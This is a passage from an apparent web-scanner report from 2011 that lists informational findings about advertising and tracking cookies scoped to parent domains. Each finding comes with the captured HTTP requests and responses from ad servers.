Date: Mon, 11 Apr 2011 16:21:24 GMT
Server: QS

5.127. http://pixel.quantserve.com/seg/p-ddEiIs2qFSY46.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/p-ddEiIs2qFSY46.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-ddEiIs2qFSY46.js?ttl=86400 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EOYBQQG8BoGRAJ-CSZUAAAqEYQ2TAAy6EAAAqoELyBC58g21AA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EIoBNgG-BoHRAJ-CSZUBCoRvkwAMuhAAuoEP3zDbUA; expires=Sun, 10-Jul-2011 16:21:06 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S19936:E0-1410006978-1302538866921"
Cache-Control: private, no-transform, max-age=86400
Expires: Tue, 12 Apr 2011 16:21:06 GMT
Content-Length: 508
Date: Mon, 11 Apr 2011 16:21:06 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...
5.128. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=4608069584519221037&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1185=4608069584519221037; put_1523=bf0d68cb-2449-4e5d-8b20-461d8ec850c3; rpb=4212%3D1%264210%3D1%264940%3D1; rpx=4212%3D11005%2C0%2C1%2C%2C%264210%3D11063%2C0%2C1%2C%2C%264940%3D11073%2C0%2C1%2C%2C; put_1994=1iolb30nur9ak

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4210%3D1%264940%3D1%264212%3D1; expires=Wed, 11-May-2011 16:41:21 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11005%2C163%2C2%2C%2C%264210%3D11063%2C0%2C1%2C%2C%264940%3D11073%2C0%2C1%2C%2C; expires=Wed, 11-May-2011 16:41:21 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=4608069584519221037; expires=Fri, 10-Jun-2011 16:41:21 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
5.129. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=4608069584519221037 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8840a33d-f9e0-46ff-b61b-4ddb7b39eea5

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:20 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=8840a33d-f9e0-46ff-b61b-4ddb7b39eea5; expires=Wed, 10-Apr-2013 16:41:20 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
5.130. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=8663496762294337265 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; uid=4608069584519221037; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:53:30 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:53:30 GMT

GIF89a.............!.......,...........D..;
5.131. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=dgreSKR1l3-fFqwVrhKk2fFaNoS5G6K4DRLGa89Io1jPVx7awJtIT5bFbQ7adJJ3pFdSCXahzXLc-TDDfVb0Sw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; adImpCount=hcuD_cLY-cjxqeempz1C09LiiLtEXvCaXpHHOA8DkTFd6ISB_q_vS5rapRhLZ6kjcxpGHxRlubu1xR21Mxu4g2rcKaMQWqzDYZ8P9fBVq5p73bvsD6p3TnXOe8vTPY4VU9calPcDERwWgL55mdMPjVxA65AQa1XNGiNWk1OEu9E; fc=yE4Hdjb8_0IaDw-kvbcz96G8z33hBqLkmZH60ZtWjYiubHizRKm2LPdnMwd17GsWDUfDXUyqCFuhCITH03Jq4PsHnm-jU8W9DeXq1d2r1JJxdxA13xTlPwal8PUkKYzs; pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:44 GMT; Path=/
Set-Cookie: pf=pJpvJJw-GY9WcrPY3UbbzAlMaMwjMfoDxm5_TBEk8RcpEp12f4u5I5reLcuvKZO7DDRejmM4-R0GPw8nZnxsAfLrRYfxpzU5vS1ocTon5Z92K-LSqiaOfWtHgQNLtq6AvBbEaXo59AdMpfQCrukR99t7fTrL-rvX4z4sMorKmw9FqlNCKvbEhmZDWAkIGHt4UyiHLNzcYCFCJazl7zAeb4zqo4lkid4kD4TI-YQ4_BSt27hlQCxY8c-5b6K26p0Kz3ueh4ztohdpSnKdH68HXZsSCvcf9l-fdBL6evCUFhUm7JWc-kGHCLEPkH3QsUD6Y7FbXeXJW_eEMAI0SR_jCPv9KKD44EjZtH-gt_pb7_bJBG17ey91deEv_XnAkcATlEHOtsC5SJkchA_zhEWhUw; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:44 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:43 GMT

GIF89a.............!.......,...........D..;
5.132. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:19 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:18 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=4435508679323945078&fpid=4&nu=n&t=
...[SNIP]...
5.133. http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302542476264&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=VFFoNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHC8opBwhQKaaAcIAY4FAHCHopBwhwrhXAcIca4FAHCdDmBwhAmoZAcII0rGAHC00pBwhgJjaAcIUEoGAH; GUID=MTMwMjM1MjIxMzsxOjE2cGZidXQxZDQ1aXVuOjM2NQ; ACID=gp060013025424780038; ASCID=gp060013025424780038

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.845773.751177.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 11 Apr 2011 17:21:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 344
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:21:18 GMT
Connection: close
Set-Cookie: C2=OizoNJpwHg02FG9BdbdhRfAZhXY0HgZ4FG9B8ophRfQKaaY0HAY4FG9BHophRfwrhXY0Hca4FG9BdDmhRfAmoZY0HI0rGG9B00phRfgJjaY0HUEoGGN; domain=advertising.com; expires=Wed, 10-Apr-2013 17:21:19 GMT; path=/
Set-Cookie: F1=B4IOj2kAAAAAJZ3CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 10-Apr-2013 17:21:19 GMT; path=/
Set-Cookie: 78539819=_4da3388e,4231558641,751177^845773^1183^0,0_; domain=advertising.com; path=/click

document.writeln('<script src="http:\/\/tag.admeld.com\/passback\/js\/3\/foxnews\/728x90\/1\/meld.js"><\/script>\r\n\r\n\r\n');
var can_adInfoTag = {};
can_adInfoTag["4231558641"] = {
"CAN_ver"
...[SNIP]...
5.134. http://r1-ads.ace.advertising.com/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302542476264&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=VFFoNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHC8opBwhQKaaAcIAY4FAHCHopBwhwrhXAcIca4FAHCdDmBwhAmoZAcII0rGAHC00pBwhgJjaAcIUEoGAH; GUID=MTMwMjM1MjIxMzsxOjE2cGZidXQxZDQ1aXVuOjM2NQ

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 11 Apr 2011 17:21:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 279
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:21:18 GMT
Connection: close
Set-Cookie: ACID=qz970013025424780040; domain=advertising.com; expires=Wed, 10-Apr-2013 17:21:18 GMT; path=/
Set-Cookie: ASCID=qz970013025424780040; domain=advertising.com; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x12
...[SNIP]...
5.135. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=38627&partnerID=216&clientID=4608&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2507573;type=ads-a681;cat=ads-a941;ord=1;num=8143914125394.076?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=db77f2e7-27f9-4223-8780-7287dc87810a; exchange_uid="eyI0IjpbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsNzM0MjI5XX0="; partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; segments_p1="eJzjYuF4PIGRi5njJAeQaIoAEv9ArP8+XCwc6z+AZDZyAACXJAhf"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 00:16:53 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 09-Apr-2011 00:16:33 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZoiuBi4Xg8gZGLmeMkB5C5/gOIuRHEfLyWCcj8xwEk/vsAAMt1Cgc="; Domain=invitemedia.com; expires=Sun, 08-Apr-2012 00:16:53 GMT; Path=/
Content-Length: 0

5.136. http://segment-pixel.invitemedia.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /unpixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /unpixel?pixelID=30767&partnerID=81&clientID=1499&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
